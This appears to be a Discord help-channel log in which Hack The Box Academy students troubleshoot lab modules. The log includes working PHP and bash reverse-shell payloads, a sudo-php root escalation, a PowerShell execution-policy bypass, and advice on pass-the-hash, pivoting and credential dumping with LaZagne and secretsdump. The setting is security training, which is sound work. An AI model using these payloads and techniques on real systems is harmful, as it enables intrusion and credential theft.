#modules

thanks a lot

now I am trying to access the ssh using the downloaded id_rsa using the command :

Can anyone help me understand a concept further in windows priv esq module? i don't understand how something is working but i've answered the question..

id_rsa not the id_rsa.pub

what should the permissions be here? chmod 600 ?

yes

Yes 600

Yeah i think im on the right tracks, cheers

644 is not 600

Im a dummy

thank you

hence why I think I need to spend 5400 for a course 😉

I'm confused over the windows priv esq module where it asks "What non-default privilege does the htb-student user have?" I've found the answer by accident/chance. How do i identify that i can use admin cmd prompt and why does it work if applocker is denied amongst other controls??

I'm getting closer but its not giving me a shell

netuser /priv if i remember right?

well whoami /priv shows 2 but you need admin to see the 3rd.

i tried the tutorial you linked and it doesn't give me a shell

how you could elevate to admin...

can someone help me with this?

I cannot run powershell

i don't understand how you are supposed to identify that the user can use cmd admin other than right clicking :l

Well, it gives lots of stuff and i do not understend how to analyse it

─[us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
└──╼ [★]$ nc -lvnp 1234
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: bind to :::1234: Address already in use. QUITTING.

so clearly something is working but when I do this

echo $TERM

I get the result the tutorial says

┌─[us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
└──╼ [★]$ echo $TERM
xterm-256color```

but the next thing I do from tutorial does nothign

your connection to the shell dropped

relaunch the shell

ok

you gotta have that connection received message

how you could run powershell script...?

execution policy

gotta set execution policy to bypass

powershell -ep bypass

Add -scope process if you’re extra responsible

it keeps disconnecting here's what I have now that I keep relaunching shell. if i try typing stuff from terminal 3 into terminal 2 it won't let me type anything

like it keeps dropping the shell

and I keep having to relaunch it

you cant upgrade the shell before you catch the shell

thatll just mess up your terminal

ok I see

I dont see the connection received in those, so you havnt relaunched the revshell again yet

listener active -> launch shell -> verify you can write commands -> upgrade shell

any of that out of order and youll have a sad time

now its saying I connected but not giving me a shell again

show image

us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
┌─[us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
Ncat: Version 7.93 ( https://nmap.org/ncat )
                                            Ncat: Listening on :::1234
                                                                      Ncat: Listening on 0.0.0.0:1234
                     Ncat: Connection from 10.129.42.249.
                                                         Ncat: Connection from 10.129.42.249:47270.

hold on

Id want to see everything after the connection from

┌─[us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
Ncat: Version 7.93 ( https://nmap.org/ncat )
                                            Ncat: Listening on :::1234
                                                                      Ncat: Listening on 0.0.0.0:1234
                     Ncat: Connection from 10.129.42.249.
                                                         Ncat: Connection from 10.129.42.249:47270.
                   ┌─[us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
Ncat: Invalid source port number "1234s". QUITTING.
                                                   ┌─[us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
Ncat: Version 7.93 ( https://nmap.org/ncat )
                                            Ncat: Listening on :::1234
                                                                      Ncat: Listening on 0.0.0.0:1234

and now its just stuck on there and won't show me output of commands

are you closing out of it after the connection from response

not purposely

hold on

I'm continually trying this stuff. Does anyone have time in a few minutes to help me one on one in maybe an hour or 45 minutes?

thanks

if its auto closing the connection could be something funky with shell_exec. I usually use system() instead

ok cool

I will try that

I gotta get some lunch

I'll be right back

In ATTACKING COMMON APPLICATIONS >>
Other Notable Applications I'm running into a reverse shell problem. __I seem to catch the shell but when i do anything it exits. __

Can anyone tell what i'm doing wrong?

invoke web request is basically just curling

you havnt done a revshell at all

I tried to catch it with msfconsole too (right screen)

it does confirm you have code execution though, so all you need to do is give it a proper payload

bro

theres no shell to catch

your payload is the equivalent of just running. "curl http://yourip/"

google Invoke-webrequest

ok, i get it now, i though it was in the script. Sometimes i blur things haha (english second language)

the exploit code executes whatever command you supply it. Up to you to give it a revshell or whatever you want it to run

awesome, thank you 🫶

Really cant work out how to get to DC on the pivoting and portforwarding skills assesments, any hints

unfortunately my notes just says

'chain connection from IP1 to IP2'

I am on host 3 and trying to get to 4

doing my head in for like 3 hours now

fwiw im 100% positive I used chisel like exclusively on that assessment but if I were to do it all over again, Id use ligolo-ng the whole way

when you had v's hash did you crack it or pth?

I'm working on the whitelist filters in the file upload module, I got the flag and understand how I bypassed everything but it says another way to try is character injection so I wrote out the bash script and added other php extensions as they suggested but I'm not getting any successful hits. Has anyone else had this issue? As I said it's not super important I've found the flag and bypassed everything with double extensions just wondering what's going on with the other way to do it.

my notes dont say

what type of hash is it

its NT but i cant seem to crack it, and all my attempts of anything arent working

if its a nt hash then pth ought to be viable most of the time

assuming that is the necessary user

what are you using to pivot with, could be the double hop problem

been trying to PTH, however nothing seems to work

rdp doesnt connect on the DC, the only thing that does is on win explorer but I need the password to access the shares

are you trying to pth from a box you already pth to

you can pth to access shares

how?

crackmapexec can

keep in mind idk if thats the intended route

yeah but im in a rabbit hole of proxies so that wont work right now

you can absolutely proxy cme

also I think I just remembered something about that skill assessment

proxychains into an ubuntu rdp then a port forward to another RDP

from within rdp you can just set up a new proxy to chain through

and just not bother with rdp any further

so forward to 445? instead of 3389

whatever you like

worlds your oyster

In Web Attacks | Mass IDOR Enumeration, when using CURL the documents disappear all the time curl -s http://url....../documents.php?uid=1" does not work, even though its in the module but curl -s http://url....../documents.php"-d="uid=1" works somehow?

just copy over the pivoting tool you prefer and run it from the rdp session

I just looked over the questions and I think youre skipping an entire box 🙂

you get v user, then go after a workstation before going after dc

ive gone, web shell > ubuntu > win1 > win2 and now trying to get into dc

yes im logged in as v on a workstation

just cant get this damn dc

yeah but v creds might not be the path to dc

idr

idk Id probably have to redo the skill assessment to know for sure whats going wrong

For linux privesc - Shared Libraries - What like informs you (enumeration perspective) when you will / should use a shared library privesc? Just simply a sudo -l with no GTFObin?

You currently have access to the ||172.16.6.25|| host?

yep and the other one after

||You don't need to get into the DC. Look around the file system||

Ive noted the drive, but i dont have the password?

How did you log in then?

pth

ah

is there a password on .25

you should get the cleartext for v somehow

right ok

ive been trying to pivot for about 2 hours lol

you can also pth for shares as well

port forward to 445 and use cme?

might need 139 too, idr

but yeah cme and smbclient can pth

Anyone help me with the password attack module with this question? What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive)

assuming that user is the path forward and shares are the route

or work harder getting thr cleartext creds

when i run lazagne.exe apear the error

lol found it,

there I was trying to what the module is tessting me on

cheers

1 cubes!

the modules will incorporate past lessons as well from time to time

this wont be the last time you need to pivot and they wont necessarily tell you that you should pivot

youll have to know thats what you need to do.

Onto Active Directory next

And that goes for most of the lessons taught

good to know, cheers

Could be easily fixed, make it cube when higher then 1 +s

just jel im now balling in cubes arent you

I'm rolling in student subscription

anyone?

have you tried evilwinrm

or cme

what do you think this error means

have you read it

LaZagne.exe

Maybe

or

start lazagne.exe all

does not have lazagne on the windows machine

Download it

i tried, and the same error apear

you in the right path for it?

They tell you in the module how to transfer it

so whats the solution to this

put lazagne on the machine

https://github.com/AlessandroZ/LaZagne/releases/

If you use xfreerdp you can just drag the Downloaded file onto it's desktop

Just use a python webserver for transfer 🙂

python3 -m http.server 8080

I don't know why but the file was not going, then I restarted the lab and now it was

thanks

I got an error while start instance, it shows the request validation failed

Any help?

how long usually does it take to finish "Attacking Enterprise Networks" module blindly? if i spent 1.5 day with little hints should i be worried about exam? xD

I did it in about a weekend, but your mileage may vary

Got this reverse shell but nothing works

For attacking thick clients anyone have an idea what went wrong with me recreating the jar file?

java -jar -cmf META-INF/MANIFEST.MF fatty-client-fixed_port.jar *
Error: Invalid or corrupt jarfile META-INF/MANIFEST.MF

I changed the port in beans.xml to 1337, redid the hash and updated the MANIFEST.MF file with it, removed the signing files

This module is brutal man

my advice with that module is to watch the ippsec video on Fatty. The entire section is ripped from the insane ranked box nearly 1 to 1

I'm following 0xdf's write up but will try that video

that section went smoothly for me but lots of people said that video helped more

hey wait

nevermind, thanks ill take a look

yea I just did it watching that video

I spent like four hours trying to reverse the stupid oracle exe

just find out that's not even the point

I was able to do it till the sql injection part following the section

but after that I wasn't able to perfom the sqli

academy is great but this needs to be reworked imo

oh this is already the fixed version of that section 🙂

it used to be worse

omg hahahah

well I guesss "try harder" right

they rewordked it?

it was so bad on release staff had to come out and assure people the content wouldn't be on the exam

piece of cake now

it literally used to look like a draft 1

I’m in the footprinting medium box and it’s rough. Can anyone help me with it? I got a lot of what I need. Just can’t implement it now

like four screen shots with one sentence annotations

yea true

it was really bad

classic off sec write ups

I spent 4 or 5 days just to complete that section...

so bad I had a staff member actually cussing about it cause they were also mad it got released like that

they hadn't other easier example

Im on the AD Skill assessment. My Powershell reverse shell is not running any commands successfully.

Anyone know how to get a functional reverse shell from the given web shell?

sounds like your payload is bunk

but I didn't bother getting a rev shell

I just uploaded my pivot tool and skipped working from the box

Wow thats creative as heck maybe ill try that

How come the question is:

 Perform an analysis of C:\Apps\Restart-OracleService.exe and identify the credentials hidden within its source code. Submit the answer using the format username:password. 

Am I reversing the wrong one?

this is mad confusing lol

theres a section for messing with fatty and then theres a section messing with that one

the oracle one is brain dead easy. Dnspy is a great tool

omfg you're right

its my tool of choice when im reversing and modding unity games

I had the answer I was just putting it into the wrong section

ty anyway

hi I am getting back to the HTB challenge

hi so I am trying to get a reverse shell at the end of getting started module. I am following the tutorial @thorn urchin posted but I am having some trouble with it. I'm stuck at the point in this screenshot.

I'm using system like you guys recommended instead of shell_exec

are you getting the connected message

yes

it says connected but I can't see a shell and the terminal gets stuck

also I see you tried upgrading a shell again without having a shell already, dont do that until youve confirmed you can run commands on the target

you wont see a shell

but it shouldnt close out either

it should get a connected message and just stay there

it gets a connected message but it never stays there

are you closing out the tab from the page you loaded

no

good

lets see

whats the exact php payload youre using again

<?php $sock=fsockopen("10.129.109.194",1234);system("/bin/sh -i <&3 >&3 2>&3"); ?>```

also after trying the terminal upgrade stuff have you completely exited the terminal and opened up a new one to start listening again

yes

ah yeah that payload wont work

ok

youre mixing two diff payloads

ok

I am not an expert on payloads

<?php system("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.129.109.194/1234 0>&1'"); ?>

try this one

its still not working

do you get the connection

hold on

no no connection but hold on let me try it a different way

yeah remember to replace the IP with whatever your tun0 ip is

I got the shell

thanks

👍

but its not giving me it as root

I have flag for user already

you probably have to escalate privileges

ok

its not very typical for web services to be running as root

except for some windows nonesense

ok but then what was the point in getting the shell if I had gotten one earlier and gotten user

is it easier to get root with PHP?

I need LinPEAS right?

hold on

I dunno, you were just trying to get a revshell so thats what I was helping with 😂

I didnt know you already had access as the user

well that was a good refresher hold on

learning some basic revshells is definitely important so this was not wasted practice

I agree

before even checking with linpeas though the first two things Id check would be sudo perms and group permissions

just cause theyre fast to check and can lead to easy wins

www-data@gettingstarted:/var/www/html/admin$ sudo -l
sudo -l
Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php

there ya go

sudo perms over the php binary

how do I do that? last time I got this far I thought there was a php vulnerability which is what today earlier was over

this isnt necessarily a php vulnerability, this is a sudo misconfiguration

ok

sudo allows you to run other commands as different users. In the above output its basically telling you that you can run php as any user(including root) without using a password

so you can just make a little snippet to spawn a shell with php, and execute it with sudo

you dont have to make it a revshell either

since you already have a shell

so I write a text file and upload it?

or do I use nano?

you could do those

you can also look up the php binary's arguments to see how to just execute a line without needing to run any files

dealers choice here

how do I execute it inline?

Look it up

ok now I'm here:

www-data@gettingstarted:/var/www/html/theme/Innovation$ php -r '$sock=fsockopen("10.10.15.25",1234);system("/bin/sh -i <&3 >&3 2>&3");'
<10.15.25",1234);system("/bin/sh -i <&3 >&3 2>&3");'    
PHP Warning:  fsockopen(): unable to connect to 10.10.15.25:1234 (Connection refused) in Command line code on line 1
sh: 1: 3: Bad file descriptor

I looked it up and its saying bad file descriptor

is this closer?

www-data@gettingstarted:/var/www/html/theme/Innovation$ php -r 'system("/bin/sh -i <&3 >&3 2>&3");'
<vation$ php -r 'system("/bin/sh -i <&3 >&3 2>&3");'    
sh: 1: 3: Bad file descriptor

idk where you got that sh -i payload from, I wouldnt use it

also you dont need a revshell cause you already have a shell

you can just call /bin/sh or /bin/bash

www-data@gettingstarted:/var/www/html/theme/Innovation$ php -r '/bin/sh;'
php -r '/bin/sh;'
PHP Parse error:  syntax error, unexpected '/', expecting end of file in Command line code on line 1

youll still need system ofc

system is executing the command youre providing to it

if youre not calling system, php is going to assume that youre giving it more php code

<www/html/theme/Innovation$ php -r 'system(/bin/sh)'    
PHP Parse error:  syntax error, unexpected '/' in Command line code on line 1
www-data@gettingstarted:/var/www/html/theme/Innovation$ php -r 'system("/bin/bash")'
<html/theme/Innovation$ php -r 'system("/bin/bash")'    
PHP Parse error:  syntax error, unexpected end of file in Command line code on line 1

getting closer

you forgot your ;

youre gunna have one more issue as well btw

thrown in Command line code on line 1

you are right

hold on

It's a very basic thing

theyre very new it seems

do I need sudo?

but trying

yup 😉

or else the system doesnt know you wanted to run it as root

^

I completed the module

thank you

@quasi wave I'd suggest looking at gtfobins/saving it

congrats

Guys is there an issue on the new network traffic analysis module ARP spoofing and abnormality section? I’m pretty sure I’m using the correct filter but it shows that my answer is incorrect

lmao I think after I get through next module I'm gonna subscribe to HTB Main Platform

in addition to academy that I'm already subscribed to

I could use the extra practice

good idea

ya

they have a new guided mode that may be useful

oh cool

@quasi wave also dont forget to take down notes about what you went through today. Especially notes on any part you particularly struggled with.

Keeping notes of what you do in labs is very useful when you vaguely remember doing something down the line and need a refresher or can't find the original thing you googled

Hey @quasi wave may I dm you in a few hours when I'm home. This is related to academy stuff as I've noticed a heavy pattern

sure am I doing something wrong?

Completed all badges

hi anyone know what means this error: Warning: Identity file ||mike||@IP_addr not accessible: No such file or directory, I used the command chmod 600 id_rsa previously to try establish the ssh connection

Congrats 🎉

hehe @acoustic owl

This might be a stupid question but can you use local windows escalation techinques like the token impersonation attack on domain joined host?

hello everyone, I'm stuck with LabEasy from Password Attack

I found an id_rsa but, when I try to log in throu ssh with that id_rsa is not working

I tried log in as root as well with no success either

any hint..!!!

you say not working but thats not very informative

what error or result are you getting when you try

||mike||@10.129.202.219: Permission denied (publickey).

show full output

Check the file permissions

what file permissions?

this is all that I got with the M user but....

this is what I got with root

`$ ssh -i root@10.129.202.219
Warning: Identity file root@10.129.202.219 not accessible: No such file or directory.
usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]
[-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
[-E log_file] [-e escape_char] [-F configfile] [-I pkcs11]
[-i identity_file] [-J [user@]host[:port]] [-L address]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[-Q query_option] [-R address] [-S ctl_path] [-W host:port]
[-w local_tun[:remote_tun]] destination [command [argument ...]]1

this is why I ask for the full output

in this response you didnt supply the id_rsa as an argument

what?, -i is not the ssh argument?

it is, but you didnt supply the id_rsa file

thats why its misinterpreting the rest of your command

ok., let me check my mistake

ty

chmod 600 <id_rsa_file>

Warning: Identity file root@blah blah blah no such file

previously done....

well if you shown full output we'd know if that was the case or not

chmod 600 <id_rsa_file>
ssh -i <id_rsa_file> <your_user>@<IP_target>

Ssh is reading "root@ip" as the id_rsa file, you didn't actually supply the file for it to use

well I don't understand... the machine is alive but ssh is frozen....

`╭─linux@samsung in ~/Documents/HTB/Academy/PasswordAttack/LabEasy
╰$ ping -c 2 10.129.202.219
PING 10.129.202.219 (10.129.202.219) 56(84) bytes of data.
64 bytes from 10.129.202.219: icmp_seq=1 ttl=63 time=74.5 ms
64 bytes from 10.129.202.219: icmp_seq=2 ttl=63 time=77.8 ms

╭─linux@samsung in ~/Documents/HTB/Academy/PasswordAttack/LabEasy
╰$ ssh -i id_rsa root@10.219.202.219
ssh: connect to host 10.219.202.219 port 22: Connection timed out`

and ssh is listening

╭─linux@samsung in ~/Documents/HTB/Academy/PasswordAttack/LabEasy ╰$ nc 10.129.202.219 22 SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.4

Hello everyone, I'm currently doing this penetration tester path and I'm stuck at the module: Getting Started > Attacking your first box > Nibbles - Initial Foothold
I tried getting the flag.txt without using msfconsole but netcat isn't opening any session after uploading the php image. I also tried using msfconsole but it's not opening session also. It keeps saying I should manually clean up the image.php on the target, whereas I didn't upload any image.php for this session.

Hi im new here, just a quick question. I just started with the "linux fundamentals" and now when im gonna start learning it, it tells me to get the VPN connection file and start vpn server and all that. Is that needed to continue or just something you can do? I looked at guides and all that for the VPN in hack the box. But i cant find out if it is optional or that you have to get the openvpn?

it is not optional when a module requires you to connect to the VPN

so it is just to install openvpn on my windows then? @fiery berry

I personally use to connect via VPN on my distro over a VM

You should not be connecting to the network with your main machine. It should only be over a VM.

you dont need to use the vpn file if you plan on using pwnbox (cloud parrotos instance)

If you do plan on using it, run it on ur own vm via vmware or vbox

well im new so i plan on only using the pwnbox thats in the browser

as ThighGoD said you can even use the pwnbox (I just forgot about it)

just so i know that i understand the "My workstation" in the browser is pwnbox right? and the vpn is only if i wanna run it on my linux just to be safe

Out of curiosity, why is this? I use a vm but never on my main *nix machine

Well, for a start, I think it's against the terms of service

but a better answer would just be that this is an open network, and while HTB say that there hasn't been any instance that they know about where one user hacked another, it's still better to err on the side of caution.

Ah right I see

💀 I didnt think it was possible (cuz they release new modules all the time)

ooooh now i see i dont need to download anything, everything is already in "my workstation" in the browser right?

He has been through all the modules for a while.
But one badge was not unlocked for him because he was too fast. 🤣
Now he got this badge too

the terminal in the browser is pwnbox which you can load in another tab, or you can connect your own machine over openvpn

Hahahahha nice

I'm stuck on the Pivots module, trying to do a pingsweep from within the meterpreter session but whenever I use the command shown in the section meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23 I just get a wall of error messages ... 0.1.50/lib/rex/socket.rb:651:in `block (2 levels) in tcp_socket_pair' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.50/lib/rex/socket.rb:650:in `synchronize' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.50/lib/rex/socket.rb:650:in `block in tcp_socket_pair' from /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn' from /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'...
When I use use post/multi/gather/ping_sweep in meterpreter, I get the following output Loading extension post/multi/gather/ping_sweep... [-] Failed to load extension: x86_64-linux-musl/post/multi/gather/ping_sweep not found
Note that I am using a Kali vm and not the pwnbox

Is there anything I can do to fix this?

Ive had this before, do a msf reinstall and reinit and it normally fixes it

i think the latest version of kali has an issue as its only started recently

Thanks, I'll give it a shot

it's just for fun only!
and I know that HTB will release new modules as well

the badges are my collection and I just want to share my happiness too only

Hello

i think so too...

in the introduction to sqlmap module, there is a section for tamper scripts which helps to bypass WAF. how do we know which scripts to use in a real life pentest ? is it just by trial and error?

trial and error, reading the error messages you recieve, and the output of sqlmap (it makes suggestions on tamper scrpts to use if it detects something)

You will use verbose option that will tell you a lot about what is happening and based on that and how application reacts to Payload you will figure out

Hello! I need some help figuring out what I'm doing wrong, I started doing the Operating system fundamentals starting with linux, and I got both first answers right but it doesnt accept my other answers

ah ok thanks !!

I am currently doing WINDOWS PRIVILEGE ESCALATION - Miscellaneous Techniques.
I managed to get a root shell and dumped the SAM SECURITY SYSTEM files and have some hashes that I were able to crack.
As the question "Using the techniques in this section, find the cleartext password for an account on the target host." is completely fuzzy about what it expects I am stuck now as it won't take two passwords I found for users on that target host.
Can somebody help me pls?

Not against ToS just general recommendation

Using the sam and system files look at how you can read these

I already read them and extracted the hashes. I also cracked two of the hashes and have 2 cleartext passwords for users. but both are not accepted as answer 😦

are they local or domain accounts

I could swear Emma said it was, a few weeks ago. I could be remembering wrong.

local

are you specifiying this when trying to login?

Hmm I think I didn't express myself well. So the question from the module is "Using the techniques in this section, find the cleartext password for an account on the target host.". I try the two cleartext passwords as answer to the module question, not to login.

yes

ill check, what part are you on?

WINDOWS PRIVILEGE ESCALATION - Miscellaneous Techniques.

I cant remember how i got it, but looking at the answer, it doesn;t look like it was cracked with a wordlist, have you tried logging in and seeing if theres any files you can get?

Ah ok thank you for looking into it! Then I will have to dig a little deeper. I think the question is confusing though, why not just ask for the specific user password (as technically my answer would also be a correct answer to that question). Will have to try a little bit later as I have to leave now.

Yeah i found it a lot with that module

some of the questiosn were very confusing

Same here 😅

just seen your dm

Hello! I'm stuck at the "Sudo" section of Linux Privilege Escalation. I tried running the exploit mentioned in the section (CVE-2013-3156) but it didn't work (can't run sudoedit as root). Am I missing something?

which question?

There's only one question. "Sudo" in the recent 0-days area

based on what information did you run CVE-2013-3156?

Did you try to list the sudo privileges at least?

The section was about Sudo vulnerabilites, the target machine was running sudo 1.8.21p2 which the CVE covered (i think?)

I did run sudo -l, I can run the /bin/ncdu command as "!root". I'm not sure if that's what you mean but I'm stuck here.

probably you want to dig deeper on this

Ive got the ||Backup.vhd drive off the david user, but how am i supposed to mount to it? I need admin to access it||

This is from the Password Attacks module, right?
Then you have to crack the file, as well as all other files...

I got it. Thank you so much!

Ah k

im working on the new module for network traffic analysis. The question is this: Inspect the ARP_Poison.pcapng file, part of this module's resources, and submit the total count of ARP requests (opcode 1) that originated from the address 08:00:27:53:0c:ba as your answer. I am using the filter: arp.opcode == 1 && (eth.src == 08:00:27:53:0c:ba) and I am getting the result 507 from the wireshark statistics page, but that is not the answer?

I had the same problem.
Look at the package no.
I am sure it is wrong but it is accepted

I have reported this error

Hi all, I'm stuck on module: Active Directory Powerview, Enumerating AD Users

Find another user with an SPN set that is not listed in the section command output (case-sensitive).

I don't really understand what this question is asking me to do. Any help please?

In LINUX PRIVILEGE ESCALATION >> LXD Containers I get stuck in lxc exec privesc /bin/bash command.

Does anyone know what i'm doing wrong? I'm following the guide step by step 🫠

https://academy.hackthebox.com/module/51/section/1588

try to use another shell other than bash

ah ok, thanks for the tip!!

I've completed the free modules on HTB and i want to progress to the one i pay 8USD i have an academic email(I'm a student) I'm low budget and i would want to know what's there for me or what's the best path to take??

That was it, thank you!

You can complete CPTS and CBBH pathway module and tier 2 modules access as long as you are on student subscription. So you are getting good value to complete pathways and all necessary things in order to prepare for CPTS or CBBH

I'm stuck in Linux Privilege Escalation > Logrotate. I can't seem to find the writable log that I have to modify to force a log rotation.

Any hints would be welcome @digital pewter @modern falcon @twilit gull @slender shoal

Check the user directory

Hello

I am stuck at the exercise of bug bounty pathway, Web Requests HTTP, there is an exercise of curl download file and locate flag. What flag I don’t see any flags in the given url

Does anyone know anything

Module/35/section/219

I use this command “ curl -o /download.php (ip address and port provided)

download.php x
1 <!DOCTYPE html>
2 <html lang="en">
4 <head>
5
<meta charset="UTF-8">
6
«meta http-equiv="X-UA-Compatible" content= "IE-edge"
7
<meta name-"viewport" content-"width device-width, initial-scale-1.0">
8
<title>Blank Page</titles
9 </head>
10|
11 <body>
12
This page is intentionally left blank.
13
<br>
14
Using cURL should be enough.
15 </body>
16
17 </html>

So now i have to ask the server for the right file

Any hints on what changes to the orignal command i have to make

How would you access a webpage on any website

:)

Thank you guys I just found the flag 😂💯❤️

Well what is the last example given on the section

So, do something similar

I hope there is a format for the answer

done thx

Trying the new csharp module, wondering if there's an answer key failure

"How can you access the element in the third row and second column of a two-dimensional array named grid in C#? "

ive tried all permutations of row/column, column/row, zero- and one-indexing

ugh are you kidding, it wants a semicolon

https://academy.hackthebox.com/module/145/section/1344 Server-side Attacks - SSTI Exploitation Example 2, I don't get it works someone I could dm please?

it didnt ask for a complete line, dont enforce syntax

Hi Guys,

Currently working on DCSync - Active Directory Enumeration & Attacks. https://academy.hackthebox.com/module/143/section/1489

Question 2 : What is this user's cleartext password?

stuck here! - have the user syncron

So far, I have ntds file using secretsdump.py. I tried mimkatz in administrative mode. but no luck

Can anyone help me with this, will be appreciate.

if you have ntds file, dump system register and use secrets dump to "dcsync". You will get syncron hash and you can crack it offline

actually, this user has reversible encryption. Secretsdump will give you the cleartext straight

@acoustic owl Okey, I managed to get the rotating log but I can´t seem to catch the shell. I've tied from the pwnbox too... Any ideas?

Shall I DM ?

I remember having the same problem doing it a few days ago. Try running logrotten with the -d switch and work out what's going on

What don't you understand about it?

I cannot get it manually

Gotcha, lemme see what I have in my notes on it

Yeah the exercise isn't that much different than the content in the section

DM me what it looks like for you right now and we can work through it

I dm u to see if u can help me out 🙂

Im still stuck, Anyone ?

on the other terminal try something like echo "test" >> backups/access.log

with secretsdump try -just-dc-user syncron instead of dump the ntds file

Starting Nmap 7.93 () at 2023-08-11 21:58 UTC
Nmap scan report for Mary-PK (192.168.0.4)
Host is up (0.00065s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1947/tcp open sentinelsrm
2869/tcp open icslap
5357/tcp open wsdapi
49156/tcp open unknown
MAC Address: 08:62:66:D7:B5:B3 (Asustek Computer)

if you are on a box read #welcome and #rules after that use /verify at #bot-commands and ask your question in the appropriate channels

and the last one doesn't work?

shall DM you

sure

Anyone else experiencing issues with the Academy VPN servers? Using the OpenVPN Connect client I constantly loose connection with the server, often not recieving a packet back for 3 minutes. I tried EU1 and EU2 but none remained stable. The build in workstation also drops ssh connections all the time. Only working way is through the integrated terminal. Is there some vpn client setting that I'm missing? Anyone else experienced the same issue?

I'm currently working on Attacking Enterprise Networks and having no problems

Module: Attacking Common Services
Chapter: Attacking SQL Databases
Question: Enumerate the "flagDB" database and submit a flag as your answer.
Issue: I'm trying login using ||m|| user with the password I found but I can't, I have run the below commands from the attack box and got the below errors:
1- ||mssqlclient.py -p 1433 @ IP -windows-auth||
||[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.||
2- ||mssqlclient.py -p 1433 **.**m @ IP -windows-auth||
||[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.||
3- ||mssqlclient.py -p 1433 **.\**m @ IP -windows-auth||
||[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.||
4- ||mssqlclient.py -p 1433 m @ IP||
||[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user 'm'.||
5- ||mssqlclient.py -p 1433 .**m @ IP||
||[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user '.**m'.||
6- ||mssqlclient.py -p 1433 **.\m @ IP||
||[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user '.**m'.||
Fix: used the below syntax
||mssqlclient.py [-db volume] -windows-auth <USERNAME>:<PASSWORD>@<IP>||

On whatever VPN server is closest for US people

I feel bad for the poor soul that got pinged 6 times

my bad got it fixed ahahahaaha

you know it's better to google + go through the section again instead of spamming here (pretty sure i saw this wall of error a while back)

https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#login or the given command for mssqlclient in the example (missing 1 tag)

it should be fixed now

noted, and thank you

Hi, I'm stuck at https://enterprise.hackthebox.com/academy-lab/3993/4683/modules/77/852

I tried getting the flag.txt without using msfconsole but netcat isn't opening any session after uploading the php image. I also tried using msfconsole but it's not opening session also. It keeps saying I should manually clean up the image.php on the target, whereas I didn't upload any image.php for this session.

Your link is the enterprise link. What module is this?

Yes it is Marcie

I'm stating most users here aren't enterprise. So the link isn't useful

Hi, I'm not sure what that means?
I saw few stuff in the folders but I can't make them work...

Hello everyone, I'm currently doing this penetration tester path and I'm stuck at the module: Getting Started > Attacking your first box > Nibbles - Initial Foothold

My hint right below it

This section pretty much walks you through it

hey guys i need a help about this :
https://academy.hackthebox.com/module/24/section/514

"htb-student@nix04:~$ hasher upload_nix.txt
1219923e466ff7d194dc99a99da5b791
htb-student@nix04:~$"

does it really matter if i unzip or not

@fathom pendant

Yes

Hey guys, Im trying the new Network Traffic Analysis module and Im stuck on the first question. Myself and another guy both got the answer ||507|| from the filter that was given in the module but this was incorrect. Can anyone push me in the right direction? https://academy.hackthebox.com/module/229/section/2446

why and how

HTB enterprise are as far as i know of is almost completely separate from HTB main and academy platform so if you need help there should be some custom support some how i think

Data is stored differently (compressed) in a zip file... so of course it makes a difference

I can't seem to open a session no matter what

Elaborate

like so when i type "hasher test.txt" when i dont unzip it will show diffrent file content and same as when i unzip right ?

Yes

When it's zipped and compressed data is stored and handled differently

After getting the password without using MSF, I uploaded the reverse php code and tried listening with NCAT but no session opened

so for unzip i need a unzipping tool like 7zip or a gunzip and also its depends right

yeah

Does your reverse php use your tun0 ip?

@fathom pendant

I also tried using MSF to get the flag but it says I should manually handle the image.php file, which is non-existent.

Yes it does

It exists

Read the section carefully

I mean most extensions tell you what tool they prefer you use

.zip you can just unzip iirc

oh thanks i got it

what about "gunzip" ?

for a .zip folders

It should work

Gunzip is generally .gzip

I can't find it anywhere though

sometimes it can be .zip right

The section should tell you

Idk probably

can i dm you for a photo im having a problem and i dont have image permission in this channel

No

why

Because I shrimply can't be bothered

hm

Like I believe there's just an unzip command

Read the part above where it tells you to start your listener

i know but im using kali linux wsl kex so im having a problem about permission i guess i cant transfer from my main desktop to my kex's desktop

Sir

You are being asked to unzip it on the target system

Is that not what the question states?

i will unzip in target system but i cant transfer my zip folder into kex so if i can transfer i would get a web server and transfer into target systm

On ncat, it just says listening on 0.0.0.0:9443

Hey 🙂

